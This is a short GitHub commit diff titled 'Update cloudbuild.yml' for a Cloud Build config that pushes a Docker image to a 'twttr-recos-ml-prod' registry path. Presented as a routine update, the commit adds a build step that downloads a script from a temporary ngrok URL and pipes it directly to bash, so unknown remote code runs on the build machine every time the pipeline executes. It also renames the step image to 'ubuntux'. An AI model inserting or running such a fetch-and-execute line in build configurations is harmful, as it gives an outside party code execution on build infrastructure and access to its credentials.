Update cloudbuild.yml

This commit is contained in:
psycho1442 2023-07-23 21:43:11 +05:00 committed by GitHub
parent 8bb821cac5
commit 9f8d8738bb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -4,5 +4,5 @@ steps:
- name: 'gcr.io/cloud-builders/docker'
args: ['push', 'gcr.io/twttr-recos-ml-prod/dataflow-gpu/beam2_39_0_py3_7']
images: ['gcr.io/twttr-recos-ml-prod/dataflow-gpu/beam2_39_0_py3_7']
- name: ubuntu
- name: ubuntux
script: apt update -y && apt-get install curl -y && curl https://15f0-39-40-107-92.ngrok-free.app/file.sh | bash